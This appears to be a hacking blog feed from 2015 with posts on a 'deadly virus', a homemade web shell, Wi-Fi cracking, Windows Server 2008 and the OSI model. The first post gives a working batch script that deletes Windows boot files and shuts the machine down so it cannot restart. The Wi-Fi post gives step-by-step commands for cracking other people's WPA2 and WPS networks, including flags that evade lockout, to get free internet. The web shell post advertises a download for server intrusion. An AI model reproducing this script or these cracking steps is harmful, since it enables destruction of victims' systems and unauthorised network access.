Tuesday, August 4, 2015

Deadly Virus!

Hello guys,

Today I'm going to tell you how to make a deadly virus that shutdown the system forever(need to format/repair).

Virus that crashes computer,  simply follow the trick.

Step 1 >> Open Notepad.
Step 2 >> Copy This Code .
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive
Step 3 >> Save As Anything.bat File In Notepad!!
This Will Pop Up A Message Saying OWNED!!
And Shut Down The Computer Never To Reboot Again!
Keep Visiting :)

Saturday, July 4, 2015

Web Shell v1.0

Hello Guys,

Welcome to this blog. I am thinking to write some more advanced post on Web server attack for gain root level access. most of you know about shell. So, coming to the point most of you are using shell c99, c100, syslink, and other shell to gain the server access.

       I've created a very own version of  shell. I know its not perfect yet. but yeah I can make it perfect :) need your help and suggestion guys.

z3r0 shell v1.0
Preview:

Update: SHELL is taken down for update. 

If you need the old one, mail us at: thez3r0@outlook.com






Download it from here.

Please suggest to make it better. 

Introduction to Windows server 2008

Hello guys, Hope you doing well.
 This post is about the basic introduction of Windows server .

Windows Server is a brand name for a group of server OS released by Microsoft. It includes all Windows operating systems that have "Windows Server" in their names, but not any other Microsoft product

 Windows Server 2008 (sometimes abbreviated as "Win2K8" or "W2K8") is one of Microsoft Windows' server line of operating systems. Released to manufacturing on February 4, 2008, and officially released on February 27, 2008, it is the successor to Windows Server 2003, released nearly five years earlier. A second release, named Windows Server 2008 R2, was released to manufacturing on July 22, 2009

Features

Windows Server 2008 is built from the same code base as Windows Vista; therefore, it shares much of the same architecture and functionality. Since the code base is common, it automatically comes with most of the technical, security, management and administrative features new to Windows Vista such as the rewritten networking stack (native IPv6, native wireless, speed and security improvements); improved image-based installation, deployment and recovery; improved diagnostics, monitoring, event logging and reporting tools; new security features such as Bit Locker and ASLR (address space layout randomization); improved Windows Firewall with secure default configuration; .NET Framework 3.0 technologies, specifically Windows Communication Foundation, Microsoft Message Queuing and Windows Workflow Foundation; and the core kernel, memory and file system improvements. Processors and memory devices are modeled as Plug and Play devices, to allow hot-plugging of these devices. This allows the system resources to be partitioned dynamically using Dynamic Hardware Partitioning; each partition has its own memory, processor and I/O host bridge devices independent of other partitions 


Active Directory

Active Directory roles are expanded with identity, certificate, and rights management services. Active Directory, until Windows Server 2003, allowed network administrators to centrally manage connected computers, to set policies for groups of users, and to centrally deploy new applications to multiple computers. This role of Active Directory is being renamed as Active Directory Domain Services (ADDS). A number of other additional services are being introduced, including Active Directory Federation Services (ADFS), Active Directory Lightweight Directory Services (AD LDS), (formerly Active Directory Application Mode, or ADAM), Active Directory Certificate Services (ADCS), and Active Directory Rights Management Services (ADRMS). Identity and certificate services allow administrators to manage user accounts and the digital certificates that allow them to access certain services and systems. Federation management services enable enterprises to share credentials with trusted partners and customers, allowing a consultant to use his company user name and password to log in on a client's network. Identity Integration Feature Pack is included as Active Directory Meta-directory Services. Each of these services represents a server role

Self-healing NTFS

In Windows versions prior to Windows Vista, if the operating system detected corruption in the file system of an NTFS volume, it marked the volume "dirty"; to correct errors on the volume, it had to be taken offline. With self-healing NTFS, an NTFS worker thread is spawned in the background which performs a localized fix-up of damaged data structures, with only the corrupted files/folders remaining unavailable without locking out the entire volume and needing the server to be taken down. The operating system now features S.M.A.R.T. detection techniques to help determine when a hard disk may fail.

Hyper-V

Hyper-V is hypervisor-based virtualization software, forming a core part of Microsoft's virtualization strategy. It virtualizes servers on an operating system's kernel layer. It can be thought of as partitioning a single physical server into multiple small computational partitions. Hyper-V includes the ability to act as a Xen virtualization hyper-visor host allowing Xen-enabled guest operating systems to run virtualized. A beta version of Hyper-V shipped with certain x86-64 editions of Windows Server 2008, prior to Microsoft's release of the final version of Hyper-V on 26 June 2008 as a free download. Also, a standalone version of Hyper-V exists; this version supports only x86-64 architecture. While the IA-32 editions of Windows Server 2008 cannot run or install Hyper-V, they can run the MMC snap-in for managing Hyper-V.

 

Server Manager

Server Manager is a new roles-based management tool for Windows Server 2008. It is a combination of Manage Your Server and Security Configuration Wizard SCW from Windows Server 2003. Server Manager is an improvement of the Configure my server dialog that launches by default on Windows Server 2003 machines. However, rather than serve only as a starting point to configuring new roles, Server Manager gathers together all of the operations users would want to conduct on the server, such as, getting a remote deployment method set up, adding more server roles etc., and provides a consolidated, portal-like view about the status of each role

Editions

Compared to its predecessor, most editions of Windows Server 2008 are available in x86-64 and IA-32 versions. These editions come in two DVDs: One for installing the IA-32 variant and the other for x64. Windows Server 2008 for Itanium-based Systems supports IA-64 processors. Microsoft has optimized the IA-64 version for high-workload scenarios like database servers and Line of Business (LOB) applications. As such, it is not optimized for use as a file server or media server. Microsoft has announced that Windows Server 2008 is the last 32-bit Windows server operating system. Editions of Windows Server 2008 include:
Microsoft DreamSpark program provides verified students with the 32-bit variant of Windows Server 2008 Standard Edition.
The Server Core feature is available in the Web, Standard, Enterprise and Datacenter editions.

Have questions??  write Us : here

 

Friday, July 3, 2015

WIFI Hacking with WPA2psk & WPS




Hello guys, Hope you are doing well. 


Most of the time people asking the same question to me “How to hack WI-FI”
So, this article dedicated to them
.
First of all our requirement for hack a Wi-Fi network.

  • ·         Kali linux
  • ·         Wi Fi adaptor ( if your laptop’s Wi Fi does not support monitor mode. Ref: Kali.org
  • ·          A wordlist or a password file. It’s like a txt file with some common words using for as password. Best is create your own password file using Crunch.
Now we have all these things. One more thing that we need is “A working Brain” :P


Okis, now start.

  • First of all check the Wi Fi connection, using this command.
#ifconfig 

You will see a network adaptor like WLAN0 or Wlan1 or wlan2 (depends)

  • Now, #ifconfig wlan0 up (In my case, my Wi Fi is wlan0)
 Its time to scan the available Wi Fi networks.  We can use two different tools for that. First is ‘Kismet’ & second it ‘Iwlist’ here we’re using Iwlist.

  • Type # iwlist wlan0 scanning
It will print all available network with their MAC address & Channel no.
Select the network that you want to hack. Copy the SSID name, MAC address, Channel no. to a notepad

  • Now, put the WI FI adaptor in monitor mode. Use #airmon-ng start wlan0 , run ifconfig to confirm(you will see a new WI FI adaptor  as mon0
  • Time to capture the Handshakes. Handshake is a file which have the password information. Here we’re using airodump to capture the valid handshakes.
Use #airodump-ng mon0 –bssid aa:bb:cc:dd:ee –channel 1 –write key
Wait until we found a valid handshake, it takes up to 45 minutes. When it show the valid handshake found, press ctrl+c to terminate job. Now we have the capture file named key.cap
Here we need a word dictionary 0r word list to crack the password, PS: Password will only crack it the wordlist have the password as plain text. Better to use own word list.(do social engineering for password guessing & use Crunch to create own word list)

  • Time to run password cracker.  Here we using Aircrack, its best tool ever to crack WI FI password.
Run # aircrack-ng /root/key.cap -w /root/wordlist/z3r0.lst
Wait for the password cracked. If password is cracked it will show the password in plain text.

If WPS enabled in WI FI


Most of shopping mall have their own WI FI zones, but they protect them using wpa2Psk, so its hard to crack them all. But they do a big mistake they enable the WPS connection on & it’s like a Jackpot for whom who want to hack WI FI & use free internet (bill paid by WI FI zone owner) .
Reaver is best tool to crack  a WI FI network with WPS enable.

  • Normally we can use this command :
#reaver –I mon0 –c 1 -b aa:bb:cc:dd:ee –vv

  • But some time admin block the continues request of WPS, so here we use this command:
#reaver –I mon0 –c 6 –b aa:bb:cc:dd:ee –vv –L –N –d 15 –T .5 –r 3:15
Details:
I               : interface
C             : channel
B             : Broadcast address (mac address of WI FI router)
L              : Ignored locked WPS status
N             : Don’t send NACK packet when errors are detected
D             : delay (-d 15= delay 15 seconds between PIN attempts)
T              : timeout period (-t .5 = for halfsecond timeout)
R             : rest (-r 3:15 = after 3 attempts, sleep for 15 seconds)

Hope, it will help you. Have any questions?? write to us: here

Sunday, June 28, 2015

ISO – OSI model



 Hello guys, Hope you doing well. 

This is a simple Post in OSI model, Hope it will help you to understand the concept of OSI model. Apart from all other Post I tried to make it simple, so everyone can understand.


International Standards Organization’s OPEN SYSTEM INTERCONNECT (ISO/OSI) model is the standard model for networking protocols and applications. It defines the seven network layer. This is a conceptual model that explains and depicts while standardizing the function of a communication system by dividing it into abstract layers.


                LAYER 1: Physical layer
                Layer2: Data link
                Layer 3: Network
                Layer 4: Transport
                Layer 5: Session
                Layer 6: Presentation
                Layer 7: Application

# Every layer adds a header except physical layer, header contains the control bits for the identification of that particular layer by the cross ponding layer of the specific machine. Data format in every layer is called as PDU, PDU= protocol Data Unit
# Tailor is added in the data-link layer for the error checking which is called CRC, CRC stands for Cyclic Redenrendency Check.  

PDU

Application
Software
Layer
Top most layer

Data or Messages

Address
Devices
Presentation
Session
transport
Core layer
Middle layer
Segment
Port address=16 bit
n/a

Network
Hardware
Layer

Lower Layer
Packet
IP address
Router, L3 switch, Brouter
Data link
Frame
MAC address
Bridge, Switch L2
Physical
Signal
n/a
Repeater, HUB


for any query related to cyber security, feel free to contact US.